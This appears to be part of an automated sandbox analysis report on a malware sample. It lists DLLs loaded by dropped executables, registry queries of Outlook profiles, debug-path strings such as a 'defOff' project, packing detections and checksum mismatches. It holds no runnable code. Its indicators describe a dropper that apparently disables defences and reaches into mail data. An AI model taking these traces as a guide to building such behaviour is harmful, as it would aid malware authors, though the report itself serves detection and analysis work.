Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1789440 > 1048576

Source: file.exe

Static PE information: Raw size of wkrmqwho is bigger than: 0x100000 < 0x19b000

Source:	Binary string: UxTheme.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: rsaenh.pdb source: firefox.exe, 00000031.00000002.3374809913.0000024F746EB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: ktmw32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WscApi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8WinTypes.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pnrpnsp.pdbh source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: xul.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nssckbi.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: cryptsp.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3374809913.0000024F746EB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8softokn3.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: profapi.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntmarta.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbXULBroadcastManager source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: CLBCatQ.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: urlmon.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8twinapi.appcore.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8kernelbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: UxTheme.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8CoreMessaging.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: win32u.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: CLBCatQ.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8bcryptprimitives.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: pnrpnsp.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: srvcli.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: imm32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: version.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mswsock.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8gkcodecs.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8iphlpapi.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8ExplorerFrame.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp, firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nsi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: winmm.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 2aff342b40.exe, 00000023.00000003.2855859321.00000000049E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8osclientcerts.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8CoreUIComponents.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8cryptbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msasn1.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8msvcp140.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp, firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ncrypt.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8webauthn.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8Kernel.Appcore.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8powrprof.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: NapiNSP.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8MMDevAPI.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2157778162.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wininet.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8kernel32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8oleaut32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: combase.pdb@ source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: rpcrt4.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8TextInputFramework.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wshbth.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8InputHost.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8ucrtbase.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: xOneCoreUAPCommonProxyStub.pdb source: firefox.exe, 00000031.00000002.3375134799.0000024F747BC000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsock32.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8audioses.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sspicli.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shell32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8rasadhlp.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8msvcp_win.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8taskschd.pdb source: firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: propsys.pdb8 source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dnsapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nlaapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8fwpuclnt.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: winhttp.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msimg32.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mswsock.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntasn1.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: devobj.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8advapi32.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8Windows.Storage.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8OnDemandConnRouteHelper.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: propsys.pdb@ source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8netprofm.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: gdi32.pdb source: firefox.exe, 00000031.00000002.3370094276.0000024F73DEF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: avrt.pdb source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8Windows.Globalization.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000031.00000002.3376454757.0000024F749A9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WLDP.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sechost.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8vcruntime140_1.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8lgpllibs.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: nssckbi.pdb@ source: firefox.exe, 00000031.00000002.3374664791.0000024F746B2000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8gdi32full.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8vcruntime140.amd64.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708C9000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: winrnr.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: version.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: dbgcore.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8OnDemandConnRouteHelper.pdb0B source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: user32.pdb source: firefox.exe, 00000031.00000002.3369787551.0000024F73D92000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8DataExchange.pdb source: firefox.exe, 00000031.00000002.3352541260.0000024F7108C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8wintrust.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: psapi.pdb source: firefox.exe, 00000031.00000002.3374447623.0000024F74640000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8WindowManagementAPI.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8npmproxy.pdb source: firefox.exe, 00000031.00000002.3336264955.0000024F708E4000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8linkinfo.pdb source: firefox.exe, 00000031.00000002.3359262332.0000024F7132B000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 8Windows.UI.Immersive.pdb source: firefox.exe, 00000031.00000002.3338203946.0000024F70953000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.c10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW;
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Unpacked PE file: 9.2.DocumentsKECFIDGCBF.exe.820000.0.unpack :EW;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 10.2.skotes.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 11.2.skotes.exe.9f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;brwftgiw:EW;oajgfsxl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Unpacked PE file: 15.2.aedbd2e320.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Unpacked PE file: 16.2.0718eb7837.exe.bc0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ackgsmri:EW;nodwasaq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ackgsmri:EW;nodwasaq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Unpacked PE file: 32.2.aedbd2e320.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wkrmqwho:EW;fzxxpvmm:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: aedbd2e320.exe.11.dr	Static PE information: real checksum: 0x1b99be should be: 0x1c31b7
Source: random[1].exe0.11.dr	Static PE information: real checksum: 0x1b99be should be: 0x1c31b7
Source: random[2].exe.11.dr	Static PE information: real checksum: 0x2bd557 should be: 0x2ba4fd
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x43dc27 should be: 0x44439c
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x1cdfd4 should be: 0x1d040a
Source: 0718eb7837.exe.11.dr	Static PE information: real checksum: 0x1cdfd4 should be: 0x1d040a
Source: 2aff342b40.exe.11.dr	Static PE information: real checksum: 0x2bd557 should be: 0x2ba4fd
